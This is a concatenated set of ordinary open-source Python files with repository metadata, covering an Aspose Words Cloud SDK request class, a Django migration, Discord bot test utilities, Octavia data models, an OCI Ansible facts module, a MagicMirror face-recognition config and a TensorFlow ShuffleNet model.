self.assertEqual(",".join(x), "t1,t2,t3,t4,t5,t3,t4,t5")
@unittest.skip("test skip")
def test_traverse_possible_list(self):
emmetEngine = Emmet(self.scripts[7])
emmetEngine.traverseTree()
emmetEngine.traverseTree()
emmetEngine.traverseTree()
self.assertEqual(",".join([i.tag for i in emmetEngine.possibleList]), "t3,t4,t5")
@unittest.skip("test skip")
def test_check2(self):
emmetEngine = Emmet(self.scripts[8])
# print(emmetEngine.root.children)
tags = ["t1", "t2", "t3", "t4", "t5", "t3", "t4", "t5"]
e = [Element(t, attr=[("attr-index", index)]) for index, t in enumerate(tags)]
emmetEngine.check2open(e[0])
emmetEngine.check2open(e[2])
emmetEngine.check2open(e[3])
emmetEngine.check2open(e[4])
emmetEngine.check2close(e[4])
emmetEngine.check2close(e[3])
emmetEngine.check2close(e[2])
emmetEngine.check2open(e[5])
emmetEngine.check2open(e[6])
emmetEngine.check2close(e[6])
emmetEngine.check2close(e[5])
emmetEngine.check2close(e[0])
| 26.228659
| 92
| 0.63257
|
36c0ad45ad5311287ddf673915e86c817eb95c62
| 3,839
|
py
|
Python
|
asposewordscloud/models/requests/create_folder_request.py
|
aspose-words-cloud/aspose-words-cloud-python
|
65c7b55fa4aac69b60d41e7f54aed231df285479
|
[
"MIT"
] | 14
|
2018-07-15T17:01:52.000Z
|
2018-11-29T06:15:33.000Z
|
asposewordscloud/models/requests/create_folder_request.py
|
aspose-words-cloud/aspose-words-cloud-python
|
65c7b55fa4aac69b60d41e7f54aed231df285479
|
[
"MIT"
] | 1
|
2018-09-28T12:59:34.000Z
|
2019-10-08T08:42:59.000Z
|
asposewordscloud/models/requests/create_folder_request.py
|
aspose-words-cloud/aspose-words-cloud-python
|
65c7b55fa4aac69b60d41e7f54aed231df285479
|
[
"MIT"
] | 2
|
2020-12-21T07:59:17.000Z
|
2022-02-16T21:41:25.000Z
|
# coding: utf-8
# -----------------------------------------------------------------------------------
# <copyright company="Aspose" file="create_folder_request.py">
# Copyright (c) 2021 Aspose.Words for Cloud
# </copyright>
# <summary>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# </summary>
# -----------------------------------------------------------------------------------
import json
from six.moves.urllib.parse import quote
from asposewordscloud import *
from asposewordscloud.models import *
from asposewordscloud.models.requests import *
from asposewordscloud.models.responses import *
class CreateFolderRequest(BaseRequestObject):
"""
Request model for create_folder operation.
Initializes a new instance.
    :param path: Target folder's path, e.g. Folder1/Folder2/. The folders will be created recursively.
    :param storage_name: Storage name.
"""
def __init__(self, path, storage_name=None):
self.path = path
self.storage_name = storage_name
def create_http_request(self, api_client):
# verify the required parameter 'path' is set
if self.path is None:
raise ValueError("Missing the required parameter `path` when calling `create_folder`") # noqa: E501
path = '/v4.0/words/storage/folder/{path}'
path_params = {}
if self.path is not None:
path_params['path'] = self.path # noqa: E501
else:
path_params['path'] = '' # noqa: E501
# path parameters
collection_formats = {}
if path_params:
path_params = api_client.sanitize_for_serialization(path_params)
path_params = api_client.parameters_to_tuples(path_params, collection_formats)
for k, v in path_params:
# specified safe chars, encode everything
path = path.replace(
'{%s}' % k,
quote(str(v), safe=api_client.configuration.safe_chars_for_path_param)
)
# remove optional path parameters
path = path.replace('//', '/')
query_params = []
if self.storage_name is not None:
query_params.append(('storageName', self.storage_name)) # noqa: E501
header_params = {}
form_params = []
body_params = None
return {
"method": "PUT",
"path": path,
"query_params": query_params,
"header_params": header_params,
"form_params": form_params,
"body": body_params,
"collection_formats": collection_formats,
"response_type": 'None' # noqa: E501
}
def get_response_type(self):
return 'None' # noqa: E501
def deserialize_response(self, api_client, response):
return None
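# --- Usage sketch (not part of the generated SDK file) ------------------------
# A minimal illustration of how this request object is typically consumed. The
# `words_api` client below is an assumption (a configured WordsApi instance with
# valid credentials), not something defined in this module.
#
#     request = CreateFolderRequest(path="Folder1/Folder2", storage_name=None)
#     words_api.create_folder(request)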
| 39.173469
| 112
| 0.633238
|
708ff3b4c8cf6bbf0a4af25f8bb414886fc3c3b5
| 657
|
py
|
Python
|
hkm/migrations/0025_userprofile_printer_presets.py
|
andersinno/kuvaselaamo
|
aed553a0ba85e82055e0de025ba2d3e3e4f2c9e6
|
[
"MIT"
] | 1
|
2017-05-07T10:46:24.000Z
|
2017-05-07T10:46:24.000Z
|
hkm/migrations/0025_userprofile_printer_presets.py
|
City-of-Helsinki/kuvaselaamo
|
3fa9b69e3f5496620852d8b138129d0069339fcd
|
[
"MIT"
] | 60
|
2016-10-18T11:18:48.000Z
|
2022-02-13T20:04:18.000Z
|
hkm/migrations/0025_userprofile_printer_presets.py
|
andersinno/kuvaselaamo
|
aed553a0ba85e82055e0de025ba2d3e3e4f2c9e6
|
[
"MIT"
] | 9
|
2017-04-18T13:26:26.000Z
|
2020-02-13T20:05:13.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2017-10-02 09:40
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('hkm', '0024_hkm_museum_user'),
]
operations = [
migrations.AddField(
model_name='userprofile',
name='printer_presets',
field=models.TextField(default=b'{"api-poster-gloss-40x30": 0, "api-poster-gloss-A4-horizontal": 0, "api-poster-50x70": 0, "api-poster-gloss-A4": 0, "api-poster-70x50": 0, "api-poster-gloss-30x40": 0}', verbose_name='Tulostimen presetit'),
),
]
| 31.285714
| 251
| 0.643836
|
acb12afe42e431fc310cb2f395337f6c8b4adcdc
| 3,960
|
py
|
Python
|
test/utils.py
|
chandur626/TeachersPetBot
|
ad1fd36be5bd3690949d0e3a6e29c9100bf43e15
|
[
"MIT"
] | null | null | null |
test/utils.py
|
chandur626/TeachersPetBot
|
ad1fd36be5bd3690949d0e3a6e29c9100bf43e15
|
[
"MIT"
] | 52
|
2021-11-20T19:29:58.000Z
|
2021-12-05T04:39:30.000Z
|
test/utils.py
|
chandur626/TeachersPetBot
|
ad1fd36be5bd3690949d0e3a6e29c9100bf43e15
|
[
"MIT"
] | null | null | null |
import os
import smtplib
from email import encoders
from email.mime.base import MIMEBase
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from dotenv import load_dotenv
import asyncio
from time import sleep
load_dotenv()
DICORD_BOT_NAME = os.getenv('DICORD_BOT_NAME')
class EmailUtility:
"""
Class provides methods handling mailing logic of attachments and remainders
"""
def __init__(self):
# Accepting username and password from env file.
self.username = os.getenv("USERNAME")
self.password = os.getenv("PASSWORD")
self.from_address = 'no-reply@teacherspetbot.com'
self.subject = 'TEACHERS PET BOT NOTIFICATION'
self.output_message = ''
def send_email(self, recipient: list, attachment=None, subject: str = '', body: str = '',
filename: str = ''):
"""
Sends email to the specified recipients.
Parameters:
recipient: user email address.
attachment: file attachments.
subject: subject of the email.
body: body of the email.
filename: specifies the file name it should use for attachment data.
Returns:
            None. On success, ``self.output_message`` records the recipients; on
            failure the error is logged to err.log and the exception is re-raised.
"""
# Recipient address are to be provided as list.
to_address = recipient if isinstance(recipient, list) else [recipient]
msg = MIMEMultipart()
msg['Subject'] = subject if subject else self.subject
msg['From'] = self.from_address
        msg['To'] = ', '.join(to_address)
body = body if body else "This mail was sent from TeachersPetBot notification service," \
" Please unsubscribe through bot to stop notifications."
msg.attach(MIMEText(body, 'plain'))
if attachment:
# Attaching the attachment data only if it exists.
part = MIMEBase('application', "octet-stream")
part.set_payload(attachment)
encoders.encode_base64(part)
part.add_header('Content-Disposition', 'attachment', filename=filename)
msg.attach(part)
try:
server = smtplib.SMTP("smtp.gmail.com", 587)
server.ehlo()
server.starttls()
server.login(self.username, self.password)
            server.sendmail(self.from_address, to_address, msg.as_string())
server.close()
self.output_message = "successfully sent the mail to " + ''.join(recipient)
print(self.output_message)
except Exception as error:
with open("err.log", "a", encoding='utf8') as f:
f.write(f"Error while sending email : {str(error)}\n")
raise error
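# --- Usage sketch (illustrative, not part of the test suite) ------------------
# Assuming valid SMTP credentials in the .env file, a plain notification mail
# could be sent like this; the recipient address is a hypothetical example.
#
#     mailer = EmailUtility()
#     mailer.send_email(["student@example.com"], subject="Reminder",
#                       body="Office hours start at 3 pm.")
#
# wait_for_msg (below) polls for a bot reply in `channel` whose text contains
# `content`, falling back to the channel history if the event wait times out.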
async def wait_for_msg(testing_bot, channel, content):
sleep(0.6)
try:
return await testing_bot.wait_for('message', timeout=2, check=lambda x: x.guild.id == channel.guild.id and x.author.name == DICORD_BOT_NAME and content in x.content)
except asyncio.TimeoutError:
messages = await channel.history(limit=1).flatten()
        if len(messages) == 0 or content not in messages[0].content:
print(f'Message content {content} not found')
raise Exception()
return messages[0]
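# wait_for_channel_create waits for the bot to create a text channel named
# `name` in the given guild, falling back to scanning the guild's existing
# text channels if the gateway event is not observed within the timeout.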
async def wait_for_channel_create(testing_bot, guild_id, name):
try:
return await testing_bot.wait_for('guild_channel_create', timeout=2, check=lambda x: x.guild.id == guild_id and x.name == name)
except asyncio.TimeoutError:
new_channel = next((ch for ch in testing_bot.get_guild(guild_id).text_channels if ch.name == name), None)
if new_channel is None:
print(f'Channel {name} not found')
raise Exception()
return new_channel
| 39.6
| 173
| 0.629798
|
627d58e4503f19b296d52a4b977014d18343ae5a
| 3,510
|
py
|
Python
|
zuul.d/octavia/amphorae/drivers/haproxy/data_models.py
|
yi-cloud/octavia
|
b7f5cfa4c3c454925a90c24984049539228806d7
|
[
"Apache-2.0"
] | null | null | null |
zuul.d/octavia/amphorae/drivers/haproxy/data_models.py
|
yi-cloud/octavia
|
b7f5cfa4c3c454925a90c24984049539228806d7
|
[
"Apache-2.0"
] | null | null | null |
zuul.d/octavia/amphorae/drivers/haproxy/data_models.py
|
yi-cloud/octavia
|
b7f5cfa4c3c454925a90c24984049539228806d7
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2014 Rackspace
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import octavia.common.data_models as models
class Topology(models.BaseDataModel):
def __init__(self, hostname=None, uuid=None, topology=None, role=None,
ip=None, ha_ip=None):
self.hostname = hostname
self.uuid = uuid
self.topology = topology
self.role = role
self.ip = ip
self.ha_ip = ha_ip
class Info(models.BaseDataModel):
def __init__(self, hostname=None, uuid=None, version=None,
api_version=None):
self.hostname = hostname
self.uuid = uuid
self.version = version
self.api_version = api_version
class Details(models.BaseDataModel):
def __init__(self, hostname=None, uuid=None, version=None,
api_version=None, network_tx=None, network_rx=None,
active=None, haproxy_count=None, cpu=None, memory=None,
disk=None, load=None, listeners=None, packages=None):
self.hostname = hostname
self.uuid = uuid
self.version = version
self.api_version = api_version
self.network_tx = network_tx
self.network_rx = network_rx
self.active = active
self.haproxy_count = haproxy_count
self.cpu = cpu
self.memory = memory
self.disk = disk
self.load = load or []
self.listeners = listeners or []
self.packages = packages or []
class CPU(models.BaseDataModel):
def __init__(self, total=None, user=None, system=None, soft_irq=None):
self.total = total
self.user = user
self.system = system
self.soft_irq = soft_irq
class Memory(models.BaseDataModel):
def __init__(self, total=None, free=None, available=None, buffers=None,
cached=None, swap_used=None, shared=None, slab=None,
committed_as=None):
self.total = total
self.free = free
self.available = available
self.buffers = buffers
self.cached = cached
self.swap_used = swap_used
self.shared = shared
self.slab = slab
self.committed_as = committed_as
class Disk(models.BaseDataModel):
def __init__(self, used=None, available=None):
self.used = used
self.available = available
class ListenerStatus(models.BaseDataModel):
def __init__(self, status=None, uuid=None, provisioning_status=None,
type=None, pools=None):
self.status = status
self.uuid = uuid
self.provisioning_status = provisioning_status
self.type = type
self.pools = pools or []
class Pool(models.BaseDataModel):
def __init__(self, uuid=None, status=None, members=None):
self.uuid = uuid
self.status = status
self.members = members or []
| 31.621622
| 79
| 0.619658
|
d2fd51501c7b3ef81d62f72d84778d72fe0ecc89
| 7,277
|
py
|
Python
|
plugins/modules/oci_limits_limit_definition_facts.py
|
LaudateCorpus1/oci-ansible-collection
|
2b1cd87b4d652a97c1ca752cfc4fdc4bdb37a7e7
|
[
"Apache-2.0"
] | null | null | null |
plugins/modules/oci_limits_limit_definition_facts.py
|
LaudateCorpus1/oci-ansible-collection
|
2b1cd87b4d652a97c1ca752cfc4fdc4bdb37a7e7
|
[
"Apache-2.0"
] | null | null | null |
plugins/modules/oci_limits_limit_definition_facts.py
|
LaudateCorpus1/oci-ansible-collection
|
2b1cd87b4d652a97c1ca752cfc4fdc4bdb37a7e7
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# Copyright (c) 2020, 2022 Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
# GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_limits_limit_definition_facts
short_description: Fetches details about one or multiple LimitDefinition resources in Oracle Cloud Infrastructure
description:
- Fetches details about one or multiple LimitDefinition resources in Oracle Cloud Infrastructure
- Includes a list of resource limits that are currently supported.
If the 'areQuotasSupported' property is true, you can create quota policies on top of this limit at the
compartment level.
version_added: "2.9.0"
author: Oracle (@oracle)
options:
compartment_id:
description:
- The OCID of the parent compartment (remember that the tenancy is simply the root compartment).
type: str
required: true
service_name:
description:
- The target service name.
type: str
name:
description:
- Optional field, filter for a specific resource limit.
type: str
sort_by:
description:
- The field to sort by.
type: str
choices:
- "name"
- "description"
sort_order:
description:
            - The sort order to use, either ascending ('ASC') or descending ('DESC'). By default, it is ascending.
type: str
choices:
- "ASC"
- "DESC"
extends_documentation_fragment: [ oracle.oci.oracle ]
"""
EXAMPLES = """
- name: List limit_definitions
oci_limits_limit_definition_facts:
# required
compartment_id: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
# optional
service_name: service_name_example
name: name_example
sort_by: name
sort_order: ASC
"""
RETURN = """
limit_definitions:
description:
- List of LimitDefinition resources
returned: on success
type: complex
contains:
name:
description:
- The resource limit name. To be used for writing policies (in case of quotas) or other programmatic calls.
returned: on success
type: str
sample: name_example
service_name:
description:
- The service name of the limit.
returned: on success
type: str
sample: service_name_example
description:
description:
- The limit description.
returned: on success
type: str
sample: description_example
scope_type:
description:
- Reflects the scope of the resource limit, whether Global (across all regions), regional, or availability domain-specific.
returned: on success
type: str
sample: GLOBAL
are_quotas_supported:
description:
- If true, quota policies can be created on top of this resource limit.
returned: on success
type: bool
sample: true
is_resource_availability_supported:
description:
- Reflects whether or not the GetResourceAvailability API is supported for this limit.
If not, the API returns an empty JSON response.
returned: on success
type: bool
sample: true
is_deprecated:
description:
- Indicates if the limit has been deprecated.
returned: on success
type: bool
sample: true
is_eligible_for_limit_increase:
description:
- Indicates if the customer can request a limit increase for this resource.
returned: on success
type: bool
sample: true
is_dynamic:
description:
- The limit for this resource has a dynamic value that is based on consumption across all OCI services.
returned: on success
type: bool
sample: true
sample: [{
"name": "name_example",
"service_name": "service_name_example",
"description": "description_example",
"scope_type": "GLOBAL",
"are_quotas_supported": true,
"is_resource_availability_supported": true,
"is_deprecated": true,
"is_eligible_for_limit_increase": true,
"is_dynamic": true
}]
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.oracle.oci.plugins.module_utils import oci_common_utils
from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (
OCIResourceFactsHelperBase,
get_custom_class,
)
try:
from oci.limits import LimitsClient
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
class LimitDefinitionFactsHelperGen(OCIResourceFactsHelperBase):
"""Supported operations: list"""
def get_required_params_for_list(self):
return [
"compartment_id",
]
def list_resources(self):
optional_list_method_params = [
"service_name",
"name",
"sort_by",
"sort_order",
]
optional_kwargs = dict(
(param, self.module.params[param])
for param in optional_list_method_params
if self.module.params.get(param) is not None
)
return oci_common_utils.list_all_resources(
self.client.list_limit_definitions,
compartment_id=self.module.params.get("compartment_id"),
**optional_kwargs
)
LimitDefinitionFactsHelperCustom = get_custom_class("LimitDefinitionFactsHelperCustom")
class ResourceFactsHelper(
LimitDefinitionFactsHelperCustom, LimitDefinitionFactsHelperGen
):
pass
def main():
module_args = oci_common_utils.get_common_arg_spec()
module_args.update(
dict(
compartment_id=dict(type="str", required=True),
service_name=dict(type="str"),
name=dict(type="str"),
sort_by=dict(type="str", choices=["name", "description"]),
sort_order=dict(type="str", choices=["ASC", "DESC"]),
)
)
module = AnsibleModule(argument_spec=module_args)
if not HAS_OCI_PY_SDK:
module.fail_json(msg="oci python sdk required for this module.")
resource_facts_helper = ResourceFactsHelper(
module=module,
resource_type="limit_definition",
service_client_class=LimitsClient,
namespace="limits",
)
result = []
if resource_facts_helper.is_list():
result = resource_facts_helper.list()
else:
resource_facts_helper.fail()
module.exit_json(limit_definitions=result)
if __name__ == "__main__":
main()
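# --- Illustrative playbook task (a sketch based on the options documented above) ---
# The service name is a hypothetical example value.
#
# - name: List limit definitions sorted by name, descending
#   oracle.oci.oci_limits_limit_definition_facts:
#     compartment_id: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
#     service_name: compute
#     sort_by: name
#     sort_order: DESC
#   register: limit_definitions_result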
| 30.57563
| 139
| 0.632266
|
7c5eb134da89a9ce485d00100d4055dca4f99fc3
| 2,741
|
py
|
Python
|
lib/mm/config.py
|
ferferga/MMM-NEXT-FacialRecognition
|
90159182de2a944b041581e16b707c4551385690
|
[
"MIT"
] | null | null | null |
lib/mm/config.py
|
ferferga/MMM-NEXT-FacialRecognition
|
90159182de2a944b041581e16b707c4551385690
|
[
"MIT"
] | null | null | null |
lib/mm/config.py
|
ferferga/MMM-NEXT-FacialRecognition
|
90159182de2a944b041581e16b707c4551385690
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# coding: utf8
"""MMM-Facial-Recognition-OCV3 - MagicMirror Module
The MIT License (MIT)
Copyright (c) 2018 Mathieu Goulène (MIT License)
Based on work by Paul-Vincent Roll (Copyright 2016) (MIT License)
"""
import os
import json
import sys
import platform
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')) + '/common/')
from commonconfig import CommonConfig
from face import FaceDetection
class MMConfig (CommonConfig):
    CONFIG_DATA = json.loads(sys.argv[1])
THRESHOLD_ATTR = 'threshold'
USE_USB_CAM_ATTR = 'useUSBCam'
TRAINING_FILE_ATTR = 'trainingFile'
INTERVAL_ATTR = 'interval'
LOGOUT_DELAY_ATTR = 'logoutDelay'
USERS_ATTR = 'users'
DEFAULT_CLASS_ATTR = 'defaultClass'
EVERYONE_CLASS_ATTR = 'everyoneClass'
WELCOME_MESSAGE_ATTR = 'welcomeMessage'
@classmethod
def toNode(cls, type, message):
print(json.dumps({type: message}))
sys.stdout.flush()
@classmethod
def getTrainingFile(cls):
return cls.get(cls.TRAINING_FILE_ATTR)
@classmethod
def getInterval(cls):
return cls.get(cls.INTERVAL_ATTR)
@classmethod
def getLogoutDelay(cls):
return cls.get(cls.LOGOUT_DELAY_ATTR)
@classmethod
def getUsers(cls):
return cls.get(cls.USERS_ATTR)
@classmethod
def getDefaultClass(cls):
return cls.get(cls.DEFAULT_CLASS_ATTR)
@classmethod
def getEveryoneClass(cls):
return cls.get(cls.EVERYONE_CLASS_ATTR)
@classmethod
def getWelcomeMessage(cls):
return cls.get(cls.WELCOME_MESSAGE_ATTR)
@classmethod
def getUseUSBCam(cls):
return cls.get(cls.USE_USB_CAM_ATTR)
@classmethod
def getThreshold(cls):
return cls.get(cls.THRESHOLD_ATTR)
@classmethod
def get(cls,key):
return cls.CONFIG_DATA[key]
@classmethod
def getCamera(cls):
cls.toNode("status", "-" * 20)
try:
if cls.get("useUSBCam") == False:
try:
import picam
cam = picam.OpenCVCapture()
cam.start()
cls.toNode("status", "PiCam loaded...")
return cam
except:
cls.toNode("status", "Error while loading camera.")
else:
raise Exception
except Exception:
try:
import webcam
cls.toNode("status", "Webcam loaded...")
return webcam.OpenCVCapture(device_id=0)
except:
cls.toNode("status", "Error while loading camera.")
cls.toNode("status", "-" * 20)
| 27.41
| 93
| 0.604524
|
786394b47c67b59385315aace07545cc9898841f
| 19,668
|
py
|
Python
|
tensorflow_/tensorflowcv/models/shufflenet.py
|
huangwenwenlili/imgclsmob
|
1505fd61acbed429773f5c7ce286c858fc2278b8
|
[
"MIT"
] | 1
|
2021-01-08T04:55:45.000Z
|
2021-01-08T04:55:45.000Z
|
tensorflow_/tensorflowcv/models/shufflenet.py
|
huangwenwenlili/imgclsmob
|
1505fd61acbed429773f5c7ce286c858fc2278b8
|
[
"MIT"
] | null | null | null |
tensorflow_/tensorflowcv/models/shufflenet.py
|
huangwenwenlili/imgclsmob
|
1505fd61acbed429773f5c7ce286c858fc2278b8
|
[
"MIT"
] | null | null | null |
"""
ShuffleNet, implemented in TensorFlow.
Original paper: 'ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile Devices,'
https://arxiv.org/abs/1707.01083.
"""
__all__ = ['ShuffleNet', 'shufflenet_g1_w1', 'shufflenet_g2_w1', 'shufflenet_g3_w1', 'shufflenet_g4_w1',
'shufflenet_g8_w1', 'shufflenet_g1_w3d4', 'shufflenet_g3_w3d4', 'shufflenet_g1_wd2', 'shufflenet_g3_wd2',
'shufflenet_g1_wd4', 'shufflenet_g3_wd4']
import os
import tensorflow as tf
from .common import conv2d, batchnorm, channel_shuffle, maxpool2d
def depthwise_conv3x3(x,
channels,
strides,
name="depthwise_conv3x3"):
"""
Depthwise convolution 3x3 layer.
Parameters:
----------
x : Tensor
Input tensor.
channels : int
Number of input/output channels.
strides : int or tuple/list of 2 int
Strides of the convolution.
name : str, default 'depthwise_conv3x3'
Block name.
Returns
-------
Tensor
Resulted tensor.
"""
return conv2d(
x=x,
in_channels=channels,
out_channels=channels,
kernel_size=3,
strides=strides,
padding=1,
groups=channels,
use_bias=False,
name=name)
def group_conv1x1(x,
in_channels,
out_channels,
groups,
name="group_conv1x1"):
"""
Group convolution 1x1 layer.
Parameters:
----------
x : Tensor
Input tensor.
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
groups : int
Number of groups.
name : str, default 'group_conv1x1'
Block name.
Returns
-------
Tensor
Resulted tensor.
"""
return conv2d(
x=x,
in_channels=in_channels,
out_channels=out_channels,
kernel_size=1,
groups=groups,
use_bias=False,
name=name)
def shuffle_unit(x,
in_channels,
out_channels,
groups,
downsample,
ignore_group,
training,
name="shuffle_unit"):
"""
ShuffleNet unit.
Parameters:
----------
x : Tensor
Input tensor.
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
groups : int
Number of groups in convolution layers.
downsample : bool
Whether do downsample.
ignore_group : bool
Whether ignore group value in the first convolution layer.
training : bool, or a TensorFlow boolean scalar tensor
Whether to return the output in training mode or in inference mode.
name : str, default 'shuffle_unit'
Unit name.
Returns
-------
Tensor
Resulted tensor.
"""
mid_channels = out_channels // 4
if downsample:
out_channels -= in_channels
identity = x
x = group_conv1x1(
x=x,
in_channels=in_channels,
out_channels=mid_channels,
groups=(1 if ignore_group else groups),
name=name + "/compress_conv1")
x = batchnorm(
x=x,
training=training,
name=name + "/compress_bn1")
x = tf.nn.relu(x, name=name + "/activ")
x = channel_shuffle(
x=x,
groups=groups)
x = depthwise_conv3x3(
x=x,
channels=mid_channels,
strides=(2 if downsample else 1),
name=name + "/dw_conv2")
x = batchnorm(
x=x,
training=training,
name=name + "/dw_bn2")
x = group_conv1x1(
x=x,
in_channels=mid_channels,
out_channels=out_channels,
groups=groups,
name=name + "/expand_conv3")
x = batchnorm(
x=x,
training=training,
name=name + "/expand_bn3")
if downsample:
identity = tf.layers.average_pooling2d(
inputs=identity,
pool_size=3,
strides=2,
padding='same',
data_format='channels_first',
name=name + "/avgpool")
x = tf.concat([x, identity], axis=1, name=name + "/concat")
else:
x = x + identity
x = tf.nn.relu(x, name=name + "/final_activ")
return x
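# Worked example of the channel bookkeeping in shuffle_unit (values assumed for
# illustration): with in_channels=240, out_channels=480, groups=3 and
# downsample=True, mid_channels = 480 // 4 = 120, the expand convolution emits
# 480 - 240 = 240 channels, and concatenating with the average-pooled
# 240-channel identity restores 480 output channels.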
def shuffle_init_block(x,
in_channels,
out_channels,
training,
name="shuffle_init_block"):
"""
ShuffleNet specific initial block.
Parameters:
----------
x : Tensor
Input tensor.
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
training : bool, or a TensorFlow boolean scalar tensor
Whether to return the output in training mode or in inference mode.
name : str, default 'shuffle_init_block'
Block name.
Returns
-------
Tensor
Resulted tensor.
"""
x = conv2d(
x=x,
in_channels=in_channels,
out_channels=out_channels,
kernel_size=3,
strides=2,
padding=1,
use_bias=False,
name=name + "/conv")
x = batchnorm(
x=x,
training=training,
name=name + "/bn")
x = tf.nn.relu(x, name=name + "/activ")
x = maxpool2d(
x=x,
pool_size=3,
strides=2,
padding=1,
name=name + "/pool")
return x
class ShuffleNet(object):
"""
ShuffleNet model from 'ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile Devices,'
https://arxiv.org/abs/1707.01083.
Parameters:
----------
channels : list of list of int
Number of output channels for each unit.
init_block_channels : int
Number of output channels for the initial unit.
groups : int
Number of groups in convolution layers.
in_channels : int, default 3
Number of input channels.
in_size : tuple of two ints, default (224, 224)
Spatial size of the expected input image.
classes : int, default 1000
Number of classification classes.
"""
def __init__(self,
channels,
init_block_channels,
groups,
in_channels=3,
in_size=(224, 224),
classes=1000,
**kwargs):
super(ShuffleNet, self).__init__(**kwargs)
self.channels = channels
self.init_block_channels = init_block_channels
self.groups = groups
self.in_channels = in_channels
self.in_size = in_size
self.classes = classes
def __call__(self,
x,
training=False):
"""
Build a model graph.
Parameters:
----------
x : Tensor
Input tensor.
training : bool, or a TensorFlow boolean scalar tensor, default False
Whether to return the output in training mode or in inference mode.
Returns
-------
Tensor
Resulted tensor.
"""
in_channels = self.in_channels
x = shuffle_init_block(
x=x,
in_channels=in_channels,
out_channels=self.init_block_channels,
training=training,
name="features/init_block")
in_channels = self.init_block_channels
for i, channels_per_stage in enumerate(self.channels):
for j, out_channels in enumerate(channels_per_stage):
downsample = (j == 0)
ignore_group = (i == 0) and (j == 0)
x = shuffle_unit(
x=x,
in_channels=in_channels,
out_channels=out_channels,
groups=self.groups,
downsample=downsample,
ignore_group=ignore_group,
training=training,
name="features/stage{}/unit{}".format(i + 1, j + 1))
in_channels = out_channels
x = tf.layers.average_pooling2d(
inputs=x,
pool_size=7,
strides=1,
data_format='channels_first',
name="features/final_pool")
x = tf.layers.flatten(x)
x = tf.layers.dense(
inputs=x,
units=self.classes,
name="output")
return x
def get_shufflenet(groups,
width_scale,
model_name=None,
pretrained=False,
root=os.path.join('~', '.tensorflow', 'models'),
**kwargs):
"""
Create ShuffleNet model with specific parameters.
Parameters:
----------
groups : int
Number of groups in convolution layers.
width_scale : float
Scale factor for width of layers.
model_name : str or None, default None
Model name for loading pretrained model.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
Returns
-------
functor
Functor for model graph creation with extra fields.
"""
init_block_channels = 24
layers = [4, 8, 4]
if groups == 1:
channels_per_layers = [144, 288, 576]
elif groups == 2:
channels_per_layers = [200, 400, 800]
elif groups == 3:
channels_per_layers = [240, 480, 960]
elif groups == 4:
channels_per_layers = [272, 544, 1088]
elif groups == 8:
channels_per_layers = [384, 768, 1536]
else:
raise ValueError("The {} of groups is not supported".format(groups))
channels = [[ci] * li for (ci, li) in zip(channels_per_layers, layers)]
if width_scale != 1.0:
channels = [[int(cij * width_scale) for cij in ci] for ci in channels]
init_block_channels = int(init_block_channels * width_scale)
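    # Worked example (values assumed for illustration): groups=3 with
    # width_scale=0.5 gives channels_per_layers = [240, 480, 960] and
    # layers = [4, 8, 4], hence channels = [[120]*4, [240]*8, [480]*4]
    # and init_block_channels = 12.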
net = ShuffleNet(
channels=channels,
init_block_channels=init_block_channels,
groups=groups,
**kwargs)
if pretrained:
if (model_name is None) or (not model_name):
raise ValueError("Parameter `model_name` should be properly initialized for loading pretrained model.")
from .model_store import download_state_dict
net.state_dict, net.file_path = download_state_dict(
model_name=model_name,
local_model_store_dir_path=root)
else:
net.state_dict = None
net.file_path = None
return net
def shufflenet_g1_w1(**kwargs):
"""
ShuffleNet 1x (g=1) model from 'ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile Devices,'
https://arxiv.org/abs/1707.01083.
